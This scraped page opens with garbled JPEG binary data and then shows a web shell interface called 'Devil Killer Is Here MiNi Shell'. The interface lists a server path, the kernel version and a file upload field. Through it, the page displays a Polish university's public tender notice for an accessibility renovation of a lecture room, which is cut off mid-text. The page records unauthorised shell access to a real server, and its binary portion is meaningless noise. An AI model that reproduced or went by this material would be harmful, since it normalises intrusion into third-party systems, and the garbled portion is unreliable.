JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250506/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250506/0021780001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie modernizacji sali 219 z dostosowaniem dla osób z niepełnosprawnościami w budynku WIŚiIM przy ul. Piątkowskiej 94 w Poznaniu – postępowanie powtórzone </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Przyrodniczy w Poznaniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001844</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wojska Polskiego 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-637</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zofia.kaczmarek@up.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.up.poznan.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie modernizacji sali 219 z dostosowaniem dla osób z niepełnosprawnościami w budynku WIŚiIM przy ul. Piątkowskiej 94 w Poznaniu – postępowanie powtórzone </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f62ac62f-0077-4153-8a73-b0143a10e7d5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00217800</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Dostępni z natury! Uniwersytet Przyrodniczy w Poznaniu jako uczelnia bez barier” współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Plus, nr projektu FERS.03.01-IP.08-0213/24, realizowany na podstawie umowy o dofinansowanie nr FERS.03.01-IP.08-0213/24-00 zawartej z Narodowym Centrum Badań i Rozwoju w dniu 19.12.2024 r. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/up_poznan <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/up_poznan</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się<br/>komunikat, że wiadomość została wysłana do zamawiającego.<br/>Za datę złożenia oferty przyjmuje się datę jej przekazania w systemie (platformie) w drugim kroku składania oferty poprzez kliknięcie<br/>przycisku “Złóż ofertę” i wyświetlenie się komunikatu, że oferta została zaszyfrowana i złożona.<br/>Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c. zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d. włączona obsługa JavaScript,<br/>e. zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f. Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a. akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod<br/>linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem: https://platformazakupowa.pl/strona/45-<br/>instrukcje<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>Ofertę należy przygotować zgodnie z wymogami niniejszej SWZ. Formularz oferty oraz pozostałe dokumenty, dla których<br/>Zamawiający określił wzory stanowią załączniki do niniejszej SWZ.<br/>Ofertę wraz ze wszystkimi załącznikami składa się, pod rygorem nieważności, w formie elektronicznej i opatruje się kwalifikowanym<br/>podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania<br/>oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>W zakresie nieuregulowanym w SWZ zastosowanie mają przepisy rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020<br/>r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>a) administratorem danych osobowych przekazywanych przez Wykonawców jest Uniwersytet Przyrodniczy w Poznaniu, ul. Wojska<br/>Polskiego 28 60-637 Poznań;<br/>b) inspektorem ochrony danych osobowych w Uniwersytecie Przyrodniczym w Poznaniu jest Pan Tomasz Napierała<br/>tomasz.napierala@up.poznan.pl tel. 61 848-7799;<br/>c) uzyskane dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn. Wykonanie modernizacji sali 219 z dostosowaniem dla osób z niepełnosprawnościami w<br/>budynku WIŚiIM przy ul. Piątkowskiej 94 w Poznaniu.<br/>d) odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art. 18 oraz art. 74 ust. 1 ustawy Pzp;<br/>e) dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały okres obowiązywania<br/>umowy;<br/>f) podanie przez Wykonawcę danych osobowych jest dobrowolne, lecz równocześnie jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>g) w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h) Wykonawcy oraz osoby, których dane osobowe zostały podane w związku z postępowaniem posiadają:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych,<br/> na podstawie art. 16 RODO prawo do sprostowania danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników)<br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego)<br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych narusza przepisy RODO<br/>i) nie przysługuje Wykonawcom oraz osobom, których dane osobowe zostały podane w związku z postępowaniem:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AZ.262.754A.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie modernizacji Sali 219 wraz z dostosowaniem dla osób z niepełnosprawnościami w<br/>budynku przy ulicy Piątkowskiej 94. Zakres prac w ramach zadania zawiera w szczególności:<br/>• likwidacje starej posadzki<br/>• przygotowanie podłoża i ułożenie nowej posadzki z wykładziny rulonowej typu Tarkett<br/>• dostawa i montaż nowych drzwi<br/>• malowanie<br/>• gruntowanie<br/>• demontaż lamp<br/>• sufit podwieszany<br/>• instalacja elektryczna<br/>• instalacja teletechniczna<br/>1. Wykonawca w brany elektrycznej i teletechnicznej zobowiązany będzie do zamontowania listwy kablowej do osprzętu<br/>kablowego zgodnego z modułami 45x45. W listwach zamontowane będą gniazda elektryczne 230V, podwójne w liczbie<br/>zgodnej z dołączonym załącznikiem. W pomieszczeniu zamontować należy 3 punkty PEL. Punkt PEL jest to punkt<br/>elektryczno - logiczny składający się z 3 gniazd sieci komputerowej cat 6A i 4 gniazd sieci elektrycznej. Nad sufitem<br/>podwieszanym należy zamontować 2 gniazda pojedyncze cat 6A dla sieci wifi. Do zadań wykonawcy należeć będzie<br/>wyprowadzenie wszystkich przewodów sieci Ethernet do szafy komputerowej zgodnie z kierunkiem wskazanym na rysunku<br/>do pomieszczenia znajdującego się na końcu ciągu komunikacyjnego. Skrętki należy prowadzić nad sufitem, zamocować i<br/>zabezpieczyć. W pomieszczeniu do którego należy doprowadzić skrętki komputerowe należy w szafie dystrybucyjnej<br/>zamontować nowy patchpanel kategorii 6A. Wykonawca po zakończonym montażu sieci komputerowej musi przekazać<br/>protokół wraz z opisami gniazd zapewniający o poprawności połączenia i zapewnieniu prędkości transmisji zgodnej ze<br/>standardem dla okablowania cat6A.<br/>2. W części sufitowej wykonawca musi zamontować 17 sztuk opraw przeznaczonych do sufitów podwieszanych o<br/>wydajności świetlnej opraw nie gorszej niż 125lm/W. Wykonawca zobligowany jest do bezwzględnego montażu klamer Klamry muszą znajdować się przed i za gniazdami zamontowanymi w listwie. Wszystkie obwody elektryczne należy<br/>doprowadzić do nowej rozdzielni elektrycznej, którą wykonawca musi wykonać w miejscu oznaczonym na rysunku jako RG.<br/>Rozdzielnię należy zabezpieczyć zgodnie z obowiązującymi przepisami prawa budowlanego, norm i innych dokumentów<br/>prawnie regulujących bezpieczeństwo podczas użytkowania urządzeń elektrycznych. W rozdzielni należy zamontować<br/>wyłącznik główny, zabezpieczenia nadprądowe, różnicowoprądowe, przepięciowe. Wszystkie gniazda należy opisać,<br/>wykonać pomiary zgodne z prawem budowlanym. Należy wymienić łączniki oświetlenia.<br/>3. Z sufitu na czas remontu należy zdemontować projektor i ekran elektryczny. Po wykonaniu montażu sufitu należy<br/>zamontować i ustawić w osi projektor. Do miejsca oznaczonego PEL w pobliżu miejsca prowadzącego należy doprowadzić<br/>kabel HDMI w standardzie 2.1. Ekran elektryczny ponownie zamontować.<br/>4. W kominach wentylacyjnych stare wentylatory należy zdemontować i poddać utylizacji a w ich miejsce zamontować nowe<br/>wentylatory typu silent o niskim poziomie hałasu podczas pracy zgodnie z dopuszczalnym poziomem dźwięku w<br/>pomieszczeniach przeznaczonych do przebywania ludzi.<br/>5. Zamawiający wymaga udzielenia gwarancji jakości i rękojmi za wady robót budowlanych, elektrycznych i teletechnicznych<br/>na zasadach niżej opisanych:<br/>a) Co najmniej 48 miesięcy na roboty budowlane, elektryczne (Uwaga: długość okresu gwarancji jakości i rękojmi za wady<br/>na roboty jest jednym z kryteriów oceny ofert).<br/>6. Celem dofinansowania do remontu sali dydaktycznej jest poprawa jej dostępności dla osób z niepełnosprawnościami i<br/>szczególnymi potrzebami poprzez zastosowanie projektowania uniwersalnego i rozwiązań poprawiających komfort<br/>użytkowania sali: regulacja natężenia światła, poprawa parametrów antypoślizgowych posadzki, dostosowanie szerokości<br/>drzwi, zamontowanie okablowania do zawieszenia monitora interaktywnego wspomagającego nauczanie metodą<br/>hybrydową.<br/>7. Wykonawca odpowiedzialny jest za kompleksową realizację przedmiotu zamówienia, w tym za: przebieg i terminowe<br/>wykonanie zamówienia, jakość, zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu<br/>zamówienia, spełnienie innych wymagań wynikających z obowiązujących przepisów prawa. Wykonawca ponosi pełną<br/>odpowiedzialność za realizację robót, a w przypadku wykonania ich niezgodnie z ustawą Prawo budowlane, dokumentacją<br/>projektową, umową lub w sytuacji uszkodzenia obiektu –Wykonawca jest zobowiązany do przywrócenia stanu pierwotnego i<br/>usunięcia powstałych usterek na własny koszt.<br/>8. Zastosowane w przedmiarach robót i w specyfikacjach technicznych wykonania i odbioru robót wskazania pochodzenia<br/>wyrobów służą określeniu standardów cech technicznych i jakościowych. Wykonawca może zastosować wskazany lub<br/>równoważny inny wyrób spełniający wymogi techniczne i jakościowe oraz posiadający właściwości użytkowe nie gorsze niż<br/>określone w Specyfikacji Technicznej. Zamawiający wskazuje, że ciężar udowodnienia równoważności jest obowiązkiem<br/>Wykonawcy. Zamawiający nie uzna rozwiązań równoważnych, jeśli będą o gorszych niż wskazane w załącznikach do<br/>Specyfikacji minimalnych wymaganiach jakościowych, funkcjonalnych, technicznych i technologicznych.<br/>9. Zamawiający stosowanie do treści art. 95 ust. 1 ustawy Pzp wymaga zatrudnienia przez wykonawcę lub podwykonawcę<br/>na podstawie umowy o pracę osób wykonujących prace fizyczne bezpośrednio na placu budowy w zakresie realizacji<br/>zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia<br/>26 czerwca 1974 r. – Kodeks pracy (t.j. Dz. U. z 2023 r. poz. 1465).<br/>10. Nie dotyczy to osób pełniących samodzielne funkcje techniczne w budownictwie w rozumieniu ustawy z dnia 07.07.1994<br/>r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725).<br/>11. Rodzaj czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie umowy<br/>o pracę przez wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia, zostały<br/>opisane w STWiORB.<br/>12. Wszystkie prace głośne ( np. wiercenie , kucie, ) należy prowadzić po godzinie 15:00 oraz w dni uzgodnione z<br/>Zamawiającym. Wymagania dotyczące robót – wszystkie prace winny być zrealizowane zgodnie z przepisami,<br/>obowiązującymi normami, warunkami technicznymi i sztuką budowlaną, przepisami bhp, ppoż. oraz z zaleceniami<br/>inspektorów nadzoru. Roboty należy prowadzić zgodnie z wymogami zawartymi w przedmiarach robót, specyfikacjami<br/>technicznymi wykonania i odbioru robot budowlanych oraz wytycznymi zawartymi w SWZ i jej załącznikach oraz Umowie.<br/>13. Uzasadnienie braku podziału zamówienia na części:<br/>Zamówienie obejmuje wykonanie robót budowlano-instalacyjnych i stanowi zwartą całość. Roboty budowlane, elektryczne i<br/>teletechniczne będą wykonywane równocześnie i wymagają bieżącej koordynacji w trakcie ich realizacji. Podział na części<br/>zakłóci ciągłość prac oraz z uwagi na konieczność przekazywania terenu budowy kolejnym wykonawcom wydłuży okres<br/>realizacji inwestycji i przysporzy problemów gwarancyjnych. Dzielenie zamówienia na części jest nieuzasadnione z punktu<br/>widzenia ekonomicznego i technicznego. .<br/>14. Opis przedmiotu zamówienia wg kodu CPV:<br/>Nazwa Kod CPV<br/>Roboty budowlane 45000000-7<br/>Roboty w zakresie instalacji elektrycznych 45310000-3<br/>15. Rozliczenie z Wykonawcą nastąpi na podstawie kosztorysu powykonawczego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został określony w Specyfikacji Warunków Zamówienia, w Rozdziale 18 - Kryteria<br/>oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi za wady robót budowlanych, elektrycznych i teletechnicznych 4.3.6.)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>zdolności technicznej lub zawodowej<br/>1) Zamawiający uzna za spełniony warunek, jeżeli Wykonawca wykaże, iż:<br/>w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, zrealizował co najmniej dwie roboty 